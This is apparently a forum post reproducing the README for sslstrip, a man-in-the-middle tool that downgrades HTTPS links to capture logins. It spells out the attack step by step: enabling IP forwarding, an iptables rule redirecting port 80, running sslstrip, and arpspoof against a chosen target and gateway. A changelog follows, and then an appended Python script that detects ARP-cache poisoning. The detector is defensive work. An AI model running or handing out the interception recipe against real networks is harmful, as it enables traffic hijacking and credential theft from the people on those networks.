Python SSLstrip

dEEpEst
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.


 README


sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing:
* Unpack: tar zxvf sslstrip-0.5.tar.gz
* Install twisted: sudo apt-get install python-twisted-web
* (Optionally) run 'python setup.py install' as root to install,
or you can just run it out of the directory.

Running:
sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the
command-line options.

The four steps to getting this working (assuming you're running Linux)
are:

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkDevice> -t <yourTarget> <theRoutersIpAddress>






Requirements


  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)


Setup


  • Code:
    tar zxvf sslstrip-0.9.tar.gz
  • Code:
    cd sslstrip-0.9
  • (optional)
    Code:
    sudo python ./setup.py install


Running sslstrip


  • Flip your machine into forwarding mode.
    Code:
    echo "1" > /proc/sys/net/ipv4/ip_forward
  • Setup iptables to redirect HTTP traffic to sslstrip.
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  • Run sslstrip.
    Code:
    sslstrip.py -l <listenPort>
  • Run arpspoof to convince a network they should send their traffic to you.
    Code:
    arpspoof -i <interface> -t <targetIP> <gatewayIP>


That should do it.


How does this work?


First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.


Development


The current development branch can be found [link hidden for visitors].


Changes in 0.9 (05/15/11)


  • Fixes for bugs introduced in 0.8 that were preventing GMail and other logins.
  • Speed enhancements.
  • Support for stripping compressed content-encodings if they slip past us.


Changes in 0.8 (04/24/11)


  • Major speed enhancements.
  • Compatibility changes for recent versions of twisted.
  • Support for stripping URLs with explicit port specifications (i.e., foo.com:443)
  • A number of small bug fixes.


Changes in 0.7 (12/18/09)


  • Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi).


Changes in 0.6 (9/22/09)


  • Fixed a silly bug in specifying the listen port with -l


Changes in 0.5 (9/11/09)


  • Switched to a fully asynchronous model, which should result in tremendous performance improvements.
  • Filter response headers.
  • Started embedding favicon links in the head section of server responses, to increase the chance that a browser will make a request for a secure favicon.


Changes in 0.4 (7/24/09)


  • Fixed a bug that would result in truncated pages.
  • Fixed a bug in relative link matching (thanks Naumaan Mohammed Nayyar)
  • Included some optimizations that should speed things up again.


Changes in 0.3 (7/15/09)


  • Fixed the regular expression compilation to work with Python 2.6.2 (thanks Simon Vans-Colina)
  • Included some optimizations that should speed things up a little.


Changes in 0.2 (02/25/09)


  • Fixed the listen port command-line option to actually work.


Changes in 0.1 (02/21/09)


  • Initial stripped-down public release.



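The ARP step described under "How does this work?" leaves a trace in the target's ARP cache: the gateway's IP resolves to a MAC address that is not the router's and that usually also belongs to another host on the segment. The following is an added example (not part of sslstrip or of the original post) that checks a Linux /proc/net/arp snapshot for that signature; the addresses, both sample tables and the function names are constructed for illustration.

```python
# Added example: flag the ARP-cache signature of gateway impersonation.
# Input is text in Linux /proc/net/arp format; both samples are constructed.
INCOMPLETE = "00:00:00:00:00:00"
ATF_COM = 0x2  # kernel flag: entry is resolved

CLEAN = """IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         02:00:00:00:00:01     *        eth0
192.0.2.50       0x1         0x2         02:00:00:00:00:50     *        eth0
"""
POISONED = """IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         02:00:00:00:00:50     *        eth0
192.0.2.50       0x1         0x2         02:00:00:00:00:50     *        eth0
192.0.2.77       0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def parse_arp_table(text):
    """Return {ip: mac} for resolved entries, skipping the header line."""
    entries = {}
    for line in text.strip().splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        if flags & ATF_COM and mac != INCOMPLETE:
            entries[ip] = mac
    return entries

def check_gateway(table, gateway_ip, known_mac=None):
    """Return findings for the gateway entry; an empty list means no anomaly."""
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return ["no resolved ARP entry for gateway %s" % gateway_ip]
    findings = []
    # Check 1: the MAC differs from the one recorded while the network was trusted.
    if known_mac and gw_mac != known_mac.lower():
        findings.append("gateway MAC is %s, expected %s" % (gw_mac, known_mac.lower()))
    # Check 2: another IP on the segment answers with the gateway's MAC.
    sharers = sorted(ip for ip, mac in table.items()
                     if mac == gw_mac and ip != gateway_ip)
    if sharers:
        findings.append("gateway MAC %s also used by %s" % (gw_mac, ", ".join(sharers)))
    return findings

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        table = parse_arp_table(sample)
        print(name, check_gateway(table, "192.0.2.1", "02:00:00:00:00:01"))
```

On a real host, pass the contents of /proc/net/arp together with the gateway MAC recorded while the network was known to be trusted.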